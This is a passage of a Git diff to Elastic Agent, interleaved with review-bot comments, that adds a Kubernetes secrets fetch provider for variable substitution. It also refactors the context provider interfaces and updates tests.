b/x-pack/elastic-agent/pkg/agent/transpiler/vars_test.go index 0b6566a7a94..b9a1fb2cd1d 100644 --- a/x-pack/elastic-agent/pkg/agent/transpiler/vars_test.go +++ b/x-pack/elastic-agent/pkg/agent/transpiler/vars_test.go @@ -9,6 +9,9 @@ import ( "github.com/stretchr/testify/assert" "github.com/stretchr/testify/require" + + "github.com/elastic/beats/v7/libbeat/common" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" ) func TestVars_Replace(t *testing.T) { @@ -215,7 +218,8 @@ func TestVars_ReplaceWithProcessors(t *testing.T) { }, }, "dynamic", - processers) + processers, + nil) require.NoError(t, err) res, err := vars.Replace("${testing.key1}") 
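Review bot: `lookupNode` does an unchecked type assertion, `provider.(composable.FetchContextProvider)`, on values taken from a `common.MapStr`, so any entry that is not a fetch provider panics during variable substitution. `NewVars` and `NewVarsWithProcessors` are exported and accept an arbitrary `common.MapStr`, so the invariant is not enforced at the boundary. Use the two-value form and skip non-matching entries: `fetchProvider, ok := provider.(composable.FetchContextProvider)` followed by `if !ok { continue }`. Typing the field as `map[string]composable.FetchContextProvider` would be stronger still. Values returned by `Fetch` also become ordinary `StrVal` nodes, so anything that logs or dumps the rendered config presumably handles them like any other string; worth confirming for secret-backed providers.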
@@ -246,3 +250,89 @@ func TestVars_ReplaceWithProcessors(t *testing.T) { NewKey("key2", NewStrVal("value2")), }, processers), res) } + +func TestVars_ReplaceWithFetchContextProvider(t *testing.T) { + processers := Processors{ + { + "add_fields": map[string]interface{}{ + "dynamic": "added", + }, + }, + } + + mockFetchProvider, err := MockContextProviderBuilder() + require.NoError(t, err) + + fetchContextProviders := common.MapStr{ + "kubernetes_secrets": mockFetchProvider, + } + vars, err := NewVarsWithProcessors( + map[string]interface{}{ + "testing": map[string]interface{}{ + "key1": "data1", + }, + "dynamic": map[string]interface{}{ + "key1": "dynamic1", + "list": []string{ + "array1", + "array2", + }, + "dict": map[string]string{ + "key1": "value1", + "key2": "value2", + }, + }, + }, + "dynamic", + processers, + fetchContextProviders) + require.NoError(t, err) + + res, err := vars.Replace("${testing.key1}") + require.NoError(t, err) + assert.Equal(t, NewStrVal("data1"), res) + + res, err = vars.Replace("${dynamic.key1}") + require.NoError(t, err) + assert.Equal(t, NewStrValWithProcessors("dynamic1", processers), res) + + res, err = vars.Replace("${other.key1|dynamic.key1}") + require.NoError(t, err) + assert.Equal(t, NewStrValWithProcessors("dynamic1", processers), res) + + res, err = vars.Replace("${dynamic.list}") + require.NoError(t, err) + assert.Equal(t, processers, res.Processors()) + assert.Equal(t, NewListWithProcessors([]Node{ + NewStrVal("array1"), + NewStrVal("array2"), + }, processers), res) + + res, err = vars.Replace("${dynamic.dict}") + require.NoError(t, err) + assert.Equal(t, processers, res.Processors()) + assert.Equal(t, NewDictWithProcessors([]Node{ + NewKey("key1", NewStrVal("value1")), + NewKey("key2", NewStrVal("value2")), + }, processers), res) + + res, err = vars.Replace("${kubernetes_secrets.test_namespace.testing_secret.secret_value}") + require.NoError(t, err) + assert.Equal(t, NewStrVal("mockedFetchContent"), res) +} + +type 
contextProviderMock struct { +} + +// MockContextProviderBuilder builds the mock context provider. +func MockContextProviderBuilder() (corecomp.ContextProvider, error) { + return &contextProviderMock{}, nil +} + +func (p *contextProviderMock) Fetch(key string) (string, bool) { + return "mockedFetchContent", true +} + +func (p *contextProviderMock) Run(comm corecomp.ContextProviderComm) error { + return nil +} diff --git a/x-pack/elastic-agent/pkg/artifact/download/composed/downloader_test.go b/x-pack/elastic-agent/pkg/artifact/download/composed/downloader_test.go index 81e9af137dc..faf0f2f26b9 100644 --- a/x-pack/elastic-agent/pkg/artifact/download/composed/downloader_test.go +++ b/x-pack/elastic-agent/pkg/artifact/download/composed/downloader_test.go @@ -38,19 +38,19 @@ func (d *SuccDownloader) Called() bool { return d.called } func TestComposed(t *testing.T) { testCases := []testCase{ - testCase{ + { downloaders: []CheckableDownloader{&FailingDownloader{}, &SuccDownloader{}}, checkFunc: func(d []CheckableDownloader) bool { return d[0].Called() && d[1].Called() }, expectedResult: true, - }, testCase{ + }, { downloaders: []CheckableDownloader{&SuccDownloader{}, &SuccDownloader{}}, checkFunc: func(d []CheckableDownloader) bool { return d[0].Called() && !d[1].Called() }, expectedResult: true, - }, testCase{ + }, { downloaders: []CheckableDownloader{&SuccDownloader{}, &FailingDownloader{}}, checkFunc: func(d []CheckableDownloader) bool { return d[0].Called() && !d[1].Called() }, expectedResult: true, - }, testCase{ + }, { downloaders: []CheckableDownloader{&FailingDownloader{}, &FailingDownloader{}}, checkFunc: func(d []CheckableDownloader) bool { return d[0].Called() && d[1].Called() }, expectedResult: false, 
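Review bot: `contextProviderMock.Fetch` always returns `("mockedFetchContent", true)`, so `TestVars_ReplaceWithFetchContextProvider` never reaches the miss branch of `lookupNode` (`return &StrVal{value: ""}, false`). A reference to a secret that does not exist is the case most likely to go wrong in production, for instance by substituting an empty string. Give the mock a `found bool` field, or add a second mock, and assert that `vars.Replace("${kubernetes_secrets.missing}")` returns an error (presumably `ErrNoMatch`) rather than an empty value.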
@@ -59,7 +59,7 @@ func TestComposed(t *testing.T) { for _, tc := range testCases { d := NewDownloader(tc.downloaders[0], tc.downloaders[1]) - r, _ := d.Download(nil, program.Spec{Name: "a", Cmd: "a", Artifact: "a/a"}, "b") + r, _ := d.Download(context.TODO(), program.Spec{Name: "a", Cmd: "a", Artifact: "a/a"}, "b") assert.Equal(t, tc.expectedResult, r == "succ") diff --git a/x-pack/elastic-agent/pkg/artifact/download/fs/verifier_test.go b/x-pack/elastic-agent/pkg/artifact/download/fs/verifier_test.go index 38d17dadf4c..8abea0e59f0 100644 --- a/x-pack/elastic-agent/pkg/artifact/download/fs/verifier_test.go +++ b/x-pack/elastic-agent/pkg/artifact/download/fs/verifier_test.go @@ -28,11 +28,6 @@ var ( beatSpec = program.Spec{Name: "Filebeat", Cmd: "filebeat", Artifact: "beat/filebeat"} ) -type testCase struct { - system string - arch string -} - func TestFetchVerify(t *testing.T) { timeout := 15 * time.Second dropPath := filepath.Join("testdata", "drop") diff --git a/x-pack/elastic-agent/pkg/artifact/download/http/downloader_test.go b/x-pack/elastic-agent/pkg/artifact/download/http/downloader_test.go index 4c6c79997cb..1db7f9e40cc 100644 --- a/x-pack/elastic-agent/pkg/artifact/download/http/downloader_test.go +++ b/x-pack/elastic-agent/pkg/artifact/download/http/downloader_test.go @@ -21,8 +21,7 @@ func TestDownloadBodyError(t *testing.T) { // part way through the download, while copying the response body. type connKey struct{} - var srv *httptest.Server - srv = httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { w.WriteHeader(http.StatusOK) w.(http.Flusher).Flush() conn := r.Context().Value(connKey{}).(net.Conn) diff --git a/x-pack/elastic-agent/pkg/artifact/install/zip/zip_installer.go b/x-pack/elastic-agent/pkg/artifact/install/zip/zip_installer.go index eba432feefb..625d90b2b20 100644 
--- a/x-pack/elastic-agent/pkg/artifact/install/zip/zip_installer.go +++ b/x-pack/elastic-agent/pkg/artifact/install/zip/zip_installer.go @@ -18,11 +18,6 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/artifact" ) -const ( - // powershellCmdTemplate uses elevated execution policy to avoid failure in case script execution is disabled on the system - powershellCmdTemplate = `set-executionpolicy unrestricted; cd %s; .\install-service-%s.ps1` -) - // Installer or zip packages type Installer struct { config *artifact.Config diff --git a/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go b/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go index 2694ed1cd3f..81fb5a56d8f 100644 --- a/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go +++ b/x-pack/elastic-agent/pkg/basecmd/version/cmd_test.go @@ -128,7 +128,7 @@ func newErrorLogger(t *testing.T) *logger.Logger { loggerCfg := logger.DefaultLoggingConfig() loggerCfg.Level = logp.ErrorLevel - log, err := logger.NewFromConfig("", loggerCfg) + log, err := logger.NewFromConfig("", loggerCfg, false) require.NoError(t, err) return log } diff --git a/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go b/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go index 46107463151..ca84aad0c21 100644 --- a/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go +++ b/x-pack/elastic-agent/pkg/capabilities/capabilities_test.go @@ -29,7 +29,7 @@ func TestLoadCapabilities(t *testing.T) { "no_caps", } - l, _ := logger.New("test") + l, _ := logger.New("test", false) for _, tc := range testCases { t.Run(tc, func(t *testing.T) { @@ -57,6 +57,8 @@ func TestLoadCapabilities(t *testing.T) { defer resultCloser.Close() expectedMap, err := expectedConfig.ToMapStr() + assert.NoError(t, err) + fixInputsType(expectedMap) fixInputsType(resultConfig) 
@@ -76,7 +78,7 @@ func TestInvalidLoadCapabilities(t *testing.T) { "invalid_output", } - l, _ := logger.New("test") + l, _ := logger.New("test", false) for _, tc := range testCases { t.Run(tc, func(t *testing.T) { @@ -340,7 +342,7 @@ func newErrorLogger(t *testing.T) *logger.Logger { loggerCfg := logger.DefaultLoggingConfig() loggerCfg.Level = logp.ErrorLevel - log, err := logger.NewFromConfig("", loggerCfg) + log, err := logger.NewFromConfig("", loggerCfg, false) require.NoError(t, err) return log } diff --git a/x-pack/elastic-agent/pkg/capabilities/input_test.go b/x-pack/elastic-agent/pkg/capabilities/input_test.go index 7a2707d8f83..dd92f360c8a 100644 --- a/x-pack/elastic-agent/pkg/capabilities/input_test.go +++ b/x-pack/elastic-agent/pkg/capabilities/input_test.go @@ -19,7 +19,7 @@ import ( func TestMultiInput(t *testing.T) { tr := &testReporter{} - l, _ := logger.New("test") + l, _ := logger.New("test", false) t.Run("no match", func(t *testing.T) { rd := &ruleDefinitions{ @@ -184,7 +184,7 @@ func TestMultiInput(t *testing.T) { } func TestInput(t *testing.T) { - l, _ := logger.New("test") + l, _ := logger.New("test", false) tr := &testReporter{} t.Run("invalid rule", func(t *testing.T) { r := &upgradeCapability{} diff --git a/x-pack/elastic-agent/pkg/capabilities/output_test.go b/x-pack/elastic-agent/pkg/capabilities/output_test.go index fca32effadc..62553cf026c 100644 --- a/x-pack/elastic-agent/pkg/capabilities/output_test.go +++ b/x-pack/elastic-agent/pkg/capabilities/output_test.go @@ -17,7 +17,7 @@ import ( func TestMultiOutput(t *testing.T) { tr := &testReporter{} - l, _ := logger.New("test") + l, _ := logger.New("test", false) t.Run("no match", func(t *testing.T) { rd := &ruleDefinitions{ Capabilities: []ruler{&outputCapability{ 
@@ -167,7 +167,7 @@ func TestMultiOutput(t *testing.T) { func TestOutput(t *testing.T) { tr := &testReporter{} - l, _ := logger.New("test") + l, _ := logger.New("test", false) t.Run("invalid rule", func(t *testing.T) { r := &upgradeCapability{} cap, err := newOutputCapability(l, r, tr) diff --git a/x-pack/elastic-agent/pkg/capabilities/rule_test.go b/x-pack/elastic-agent/pkg/capabilities/rule_test.go index 5f3bab860bf..c6e367fc517 100644 --- a/x-pack/elastic-agent/pkg/capabilities/rule_test.go +++ b/x-pack/elastic-agent/pkg/capabilities/rule_test.go @@ -15,7 +15,7 @@ import ( func TestUnmarshal(t *testing.T) { t.Run("valid json", func(t *testing.T) { - rr := &ruleDefinitions{Capabilities: make([]ruler, 0, 0)} + rr := &ruleDefinitions{Capabilities: make([]ruler, 0)} err := json.Unmarshal(jsonDefinitionValid, &rr) @@ -35,7 +35,7 @@ func TestUnmarshal(t *testing.T) { }) t.Run("valid yaml", func(t *testing.T) { - rr := &ruleDefinitions{Capabilities: make([]ruler, 0, 0)} + rr := &ruleDefinitions{Capabilities: make([]ruler, 0)} err := yaml.Unmarshal(yamlDefinitionValid, &rr) diff --git a/x-pack/elastic-agent/pkg/capabilities/upgrade_test.go b/x-pack/elastic-agent/pkg/capabilities/upgrade_test.go index 0dc82ed3507..64b36afad83 100644 --- a/x-pack/elastic-agent/pkg/capabilities/upgrade_test.go +++ b/x-pack/elastic-agent/pkg/capabilities/upgrade_test.go @@ -15,7 +15,7 @@ import ( func TestUpgrade(t *testing.T) { tr := &testReporter{} - l, _ := logger.New("test") + l, _ := logger.New("test", false) t.Run("invalid rule", func(t *testing.T) { r := &inputCapability{} cap, err := newUpgradeCapability(l, r, tr) diff --git a/x-pack/elastic-agent/pkg/composable/context.go b/x-pack/elastic-agent/pkg/composable/context.go index f77033d1d6d..c5f1d187d42 100644 --- a/x-pack/elastic-agent/pkg/composable/context.go +++ b/x-pack/elastic-agent/pkg/composable/context.go 
@@ -5,30 +5,16 @@ package composable import ( - "context" "fmt" "strings" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) -// ContextProviderComm is the interface that a context provider uses to communicate back to Elastic Agent. -type ContextProviderComm interface { - context.Context - - // Set sets the current mapping for this context. - Set(map[string]interface{}) error -} - -// ContextProvider is the interface that a context provider must implement. -type ContextProvider interface { - // Run runs the context provider. - Run(ContextProviderComm) error -} - // ContextProviderBuilder creates a new context provider based on the given config and returns it. -type ContextProviderBuilder func(log *logger.Logger, config *config.Config) (ContextProvider, error) +type ContextProviderBuilder func(log *logger.Logger, config *config.Config) (corecomp.ContextProvider, error) // AddContextProvider adds a new ContextProviderBuilder func (r *providerRegistry) AddContextProvider(name string, builder ContextProviderBuilder) error { diff --git a/x-pack/elastic-agent/pkg/composable/controller.go b/x-pack/elastic-agent/pkg/composable/controller.go index cb629f4c7e9..8818e0752bd 100644 --- a/x-pack/elastic-agent/pkg/composable/controller.go +++ b/x-pack/elastic-agent/pkg/composable/controller.go @@ -8,16 +8,18 @@ import ( "context" "encoding/json" "fmt" - "strings" - "reflect" "sort" + "strings" "sync" "time" + "github.com/elastic/beats/v7/libbeat/common" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/transpiler" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) 
@@ -98,6 +100,8 @@ func (c *controller) Run(ctx context.Context, cb VarsCallback) error { notify := make(chan bool, 5000) localCtx, cancel := context.WithCancel(ctx) + fetchContextProviders := common.MapStr{} + // run all the enabled context providers for name, state := range c.contextProviders { state.Context = localCtx @@ -107,6 +111,9 @@ func (c *controller) Run(ctx context.Context, cb VarsCallback) error { cancel() return errors.New(err, fmt.Sprintf("failed to run provider '%s'", name), errors.TypeConfig, errors.M("provider", name)) } + if p, ok := state.provider.(corecomp.FetchContextProvider); ok { + fetchContextProviders.Put(name, p) + } } // run all the enabled dynamic providers @@ -151,7 +158,7 @@ func (c *controller) Run(ctx context.Context, cb VarsCallback) error { mapping[name] = state.Current() } // this is ensured not to error, by how the mappings states are verified - vars[0], _ = transpiler.NewVars(mapping) + vars[0], _ = transpiler.NewVars(mapping, fetchContextProviders) // add to the vars list for each dynamic providers mappings for name, state := range c.dynamicProviders { @@ -159,7 +166,7 @@ func (c *controller) Run(ctx context.Context, cb VarsCallback) error { local, _ := cloneMap(mapping) // will not fail; already been successfully cloned once local[name] = mappings.mapping // this is ensured not to error, by how the mappings states are verified - v, _ := transpiler.NewVarsWithProcessors(local, name, mappings.processors) + v, _ := transpiler.NewVarsWithProcessors(local, name, mappings.processors, fetchContextProviders) vars = append(vars, v) } } @@ -175,7 +182,7 @@ func (c *controller) Run(ctx context.Context, cb VarsCallback) error { type contextProviderState struct { context.Context - provider ContextProvider + provider corecomp.ContextProvider lock sync.RWMutex mapping map[string]interface{} signal chan bool 
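Review bot: In `Run`, the added `fetchContextProviders.Put(name, p)` discards both return values of `MapStr.Put`, so a provider that fails to register only surfaces later as a variable that does not resolve. `Put` also interprets dots in the key as a nested path, so a provider name containing a dot would presumably not be stored under its own name. Checking the result, e.g. `if _, err := fetchContextProviders.Put(name, p); err != nil { cancel(); return err }`, keeps that failure visible at start-up. The body of `Run` continues outside these hunks.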
@@ -189,7 +196,7 @@ func (c *contextProviderState) Set(mapping map[string]interface{}) error { return err } // ensure creating vars will not error - _, err = transpiler.NewVars(mapping) + _, err = transpiler.NewVars(mapping, nil) if err != nil { return err } @@ -244,7 +251,7 @@ func (c *dynamicProviderState) AddOrUpdate(id string, priority int, mapping map[ return err } // ensure creating vars will not error - _, err = transpiler.NewVars(mapping) + _, err = transpiler.NewVars(mapping, nil) if err != nil { return err } diff --git a/x-pack/elastic-agent/pkg/composable/controller_test.go b/x-pack/elastic-agent/pkg/composable/controller_test.go index da05a41bfd3..c910a905d5e 100644 --- a/x-pack/elastic-agent/pkg/composable/controller_test.go +++ b/x-pack/elastic-agent/pkg/composable/controller_test.go @@ -75,7 +75,7 @@ func TestController(t *testing.T) { }) require.NoError(t, err) - log, err := logger.New("") + log, err := logger.New("", false) require.NoError(t, err) c, err := composable.New(log, cfg) require.NoError(t, err) diff --git a/x-pack/elastic-agent/pkg/composable/providers/agent/agent.go b/x-pack/elastic-agent/pkg/composable/providers/agent/agent.go index c6f1a91e321..efba2598ad0 100644 --- a/x-pack/elastic-agent/pkg/composable/providers/agent/agent.go +++ b/x-pack/elastic-agent/pkg/composable/providers/agent/agent.go @@ -9,6 +9,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) 
@@ -20,7 +21,7 @@ func init() { type contextProvider struct{} // Run runs the Agent context provider. -func (*contextProvider) Run(comm composable.ContextProviderComm) error { +func (*contextProvider) Run(comm corecomp.ContextProviderComm) error { a, err := info.NewAgentInfo() if err != nil { return err @@ -41,6 +42,6 @@ func (*contextProvider) Run(comm composable.ContextProviderComm) error { } // ContextProviderBuilder builds the context provider. -func ContextProviderBuilder(_ *logger.Logger, _ *config.Config) (composable.ContextProvider, error) { +func ContextProviderBuilder(_ *logger.Logger, _ *config.Config) (corecomp.ContextProvider, error) { return &contextProvider{}, nil } diff --git a/x-pack/elastic-agent/pkg/composable/providers/docker/docker.go b/x-pack/elastic-agent/pkg/composable/providers/docker/docker.go index 902ceb7c832..ad49bac6288 100644 --- a/x-pack/elastic-agent/pkg/composable/providers/docker/docker.go +++ b/x-pack/elastic-agent/pkg/composable/providers/docker/docker.go @@ -91,9 +91,7 @@ func (c *dynamicProvider) Run(comm composable.DynamicProviderComm) error { }) stoppers[data.container.ID] = stopper case data := <-stopTrigger: - if _, ok := stoppers[data.container.ID]; ok { - delete(stoppers, data.container.ID) - } + delete(stoppers, data.container.ID) comm.Remove(data.container.ID) } } diff --git a/x-pack/elastic-agent/pkg/composable/providers/env/env.go b/x-pack/elastic-agent/pkg/composable/providers/env/env.go index 1eefb7c2ff3..e068aa7a14e 100644 --- a/x-pack/elastic-agent/pkg/composable/providers/env/env.go +++ b/x-pack/elastic-agent/pkg/composable/providers/env/env.go @@ -11,6 +11,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) 
@@ -21,7 +22,7 @@ func init() { type contextProvider struct{} // Run runs the environment context provider. -func (*contextProvider) Run(comm composable.ContextProviderComm) error { +func (*contextProvider) Run(comm corecomp.ContextProviderComm) error { err := comm.Set(getEnvMapping()) if err != nil { return errors.New(err, "failed to set mapping", errors.TypeUnexpected) @@ -30,7 +31,7 @@ func (*contextProvider) Run(comm composable.ContextProviderComm) error { } // ContextProviderBuilder builds the context provider. -func ContextProviderBuilder(_ *logger.Logger, _ *config.Config) (composable.ContextProvider, error) { +func ContextProviderBuilder(_ *logger.Logger, _ *config.Config) (corecomp.ContextProvider, error) { return &contextProvider{}, nil } diff --git a/x-pack/elastic-agent/pkg/composable/providers/host/host.go b/x-pack/elastic-agent/pkg/composable/providers/host/host.go index b8971adb477..3bced796ac2 100644 --- a/x-pack/elastic-agent/pkg/composable/providers/host/host.go +++ b/x-pack/elastic-agent/pkg/composable/providers/host/host.go @@ -16,6 +16,7 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" ) @@ -38,7 +39,7 @@ type contextProvider struct { } // Run runs the environment context provider. -func (c *contextProvider) Run(comm composable.ContextProviderComm) error { +func (c *contextProvider) Run(comm corecomp.ContextProviderComm) error { current, err := c.fetcher() if err != nil { return err 
@@ -79,7 +80,7 @@ func (c *contextProvider) Run(comm composable.ContextProviderComm) error { } // ContextProviderBuilder builds the context provider. -func ContextProviderBuilder(log *logger.Logger, c *config.Config) (composable.ContextProvider, error) { +func ContextProviderBuilder(log *logger.Logger, c *config.Config) (corecomp.ContextProvider, error) { p := &contextProvider{ logger: log, fetcher: getHostInfo, diff --git a/x-pack/elastic-agent/pkg/composable/providers/host/host_test.go b/x-pack/elastic-agent/pkg/composable/providers/host/host_test.go index c2e467c5b04..c6c758a25c3 100644 --- a/x-pack/elastic-agent/pkg/composable/providers/host/host_test.go +++ b/x-pack/elastic-agent/pkg/composable/providers/host/host_test.go @@ -31,7 +31,7 @@ func TestContextProvider(t *testing.T) { }) require.NoError(t, err) builder, _ := composable.Providers.GetContextProvider("host") - log, err := logger.New("host_test") + log, err := logger.New("host_test", false) require.NoError(t, err) provider, err := builder(log, c) require.NoError(t, err) diff --git a/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/config.go b/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/config.go new file mode 100644 index 00000000000..29463db148a --- /dev/null +++ b/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/config.go @@ -0,0 +1,13 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +// TODO review the need for this +// +build linux darwin windows + +package kubernetessecrets + +// Config for kubernetes provider +type Config struct { + KubeConfig string `config:"kube_config"` +} 
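Review bot: The new `config.go` carries `// +build linux darwin windows`, but `kubernetes_secrets.go` in the same package has no constraint and uses `Config`, so a build for any other GOOS would fail on an undefined type. The `// TODO review the need for this` next to the tag suggests it is not required; either drop it or put the same constraint on every file of the package. Whether the agent is built for other platforms is not visible in this diff.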
diff --git a/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/kubernetes_secrets.go b/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/kubernetes_secrets.go new file mode 100644 index 00000000000..4af00bc766e --- /dev/null +++ b/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/kubernetes_secrets.go 
@@ -0,0 +1,94 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package kubernetessecrets + +import ( + "context" + "strings" + + metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" + k8sclient "k8s.io/client-go/kubernetes" + + "github.com/elastic/beats/v7/libbeat/common/kubernetes" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/composable" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" +) + +var _ corecomp.FetchContextProvider = (*contextProviderK8sSecrets)(nil) +var getK8sClientFunc = getK8sClient + +func init() { + composable.Providers.AddContextProvider("kubernetes_secrets", ContextProviderBuilder) +} + +type contextProviderK8sSecrets struct { + logger *logger.Logger + config *Config + client k8sclient.Interface +} + +// ContextProviderBuilder builds the context provider. +func ContextProviderBuilder(logger *logger.Logger, c *config.Config) (corecomp.ContextProvider, error) { + var cfg Config + if c == nil { + c = config.New() + } + err := c.Unpack(&cfg) + if err != nil { + return nil, errors.New(err, "failed to unpack configuration") + } + return &contextProviderK8sSecrets{logger, &cfg, nil}, nil +} + +func (p *contextProviderK8sSecrets) Fetch(key string) (string, bool) { + // key = "kubernetes_secrets.somenamespace.somesecret.value" + tokens := strings.Split(key, ".") + if len(tokens) > 0 && tokens[0] != "kubernetes_secrets" { + return "", false + } + if len(tokens) != 4 { + p.logger.Debugf( + "not valid secret key: %v. 
Secrets should be of the following format %v", + key, + "kubernetes_secrets.somenamespace.somesecret.value", + ) + return "", false + } + ns := tokens[1] + secretName := tokens[2] + secretVar := tokens[3] + + secretIntefrace := p.client.CoreV1().Secrets(ns) + ctx := context.TODO() + secret, err := secretIntefrace.Get(ctx, secretName, metav1.GetOptions{}) + if err != nil { + p.logger.Errorf("Could not retrieve secret from k8s API: %v", err) + return "", false + } + if _, ok := secret.Data[secretVar]; !ok { + p.logger.Errorf("Could not retrieve value %v for secret %v", secretVar, secretName) + return "", false + } + secretString := secret.Data[secretVar] + return string(secretString), true +} + +// Run initializes the k8s secrets context provider. +func (p *contextProviderK8sSecrets) Run(comm corecomp.ContextProviderComm) error { + client, err := getK8sClientFunc(p.config.KubeConfig) + if err != nil { + p.logger.Debugf("Kubernetes_secrets provider skipped, unable to connect: %s", err) + return nil + } + p.client = client + return nil +} + +func getK8sClient(kubeconfig string) (k8sclient.Interface, error) { + return kubernetes.GetKubernetesClient(kubeconfig) +} diff --git a/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/kubernetes_secrets_test.go b/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/kubernetes_secrets_test.go new file mode 100644 index 00000000000..66943300427 --- /dev/null +++ b/x-pack/elastic-agent/pkg/composable/providers/kubernetessecrets/kubernetes_secrets_test.go 
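Review bot: `Fetch` calls `p.client.CoreV1()` without checking that a client exists, but `Run` returns nil and leaves `p.client` unset when `getK8sClientFunc` fails, so the first `kubernetes_secrets.*` lookup on a host without cluster access would panic on a nil interface. A guard at the top of `Fetch`, `if p.client == nil { return "", false }`, keeps the provider inert in that case. `p.client` is also written in `Run` and read in `Fetch` with no synchronisation, which is a data race if the two run on different goroutines (not visible here). The namespace and secret name come straight from the variable key, so the secrets reachable through this provider are bounded only by the RBAC of the agent's credentials; a doc comment on `Fetch` saying so, and a deadline on the request instead of `context.TODO()`, would help operators scope it.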
@@ -0,0 +1,100 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package kubernetessecrets + +import ( + "context" + "testing" + + "github.com/stretchr/testify/assert" + "github.com/stretchr/testify/require" + + v1 "k8s.io/api/core/v1" + metav1 "k8s.io/apimachinery/pkg/apis/meta/v1" + k8sclient "k8s.io/client-go/kubernetes" + k8sfake "k8s.io/client-go/kubernetes/fake" + + "github.com/elastic/beats/v7/libbeat/logp" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + corecomp "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/composable" +) + +func Test_K8sSecretsProvider_Fetch(t *testing.T) { + client := k8sfake.NewSimpleClientset() + ns := "test_namespace" + pass := "testing_passpass" + secret := &v1.Secret{ + TypeMeta: metav1.TypeMeta{ + Kind: "Secret", + APIVersion: "apps/v1beta1", + }, + ObjectMeta: metav1.ObjectMeta{ + Name: "testing_secret", + Namespace: ns, + }, + Data: map[string][]byte{ + "secret_value": []byte(pass), + }, + } + _, err := client.CoreV1().Secrets(ns).Create(context.Background(), secret, metav1.CreateOptions{}) + require.NoError(t, err) + + logger := logp.NewLogger("test_k8s_secrets") + cfg, err := config.NewConfigFrom(map[string]string{"a": "b"}) + require.NoError(t, err) + + p, err := ContextProviderBuilder(logger, cfg) + require.NoError(t, err) + + fp := p.(corecomp.FetchContextProvider) + + getK8sClientFunc = func(kubeconfig string) (k8sclient.Interface, error) { + return client, nil + } + require.NoError(t, err) + fp.Run(nil) + val, found := fp.Fetch("kubernetes_secrets.test_namespace.testing_secret.secret_value") + assert.True(t, found) + assert.Equal(t, val, pass) +} + +func Test_K8sSecretsProvider_FetchWrongSecret(t *testing.T) { + client := k8sfake.NewSimpleClientset() + ns := "test_namespace" + pass := "testing_passpass" 
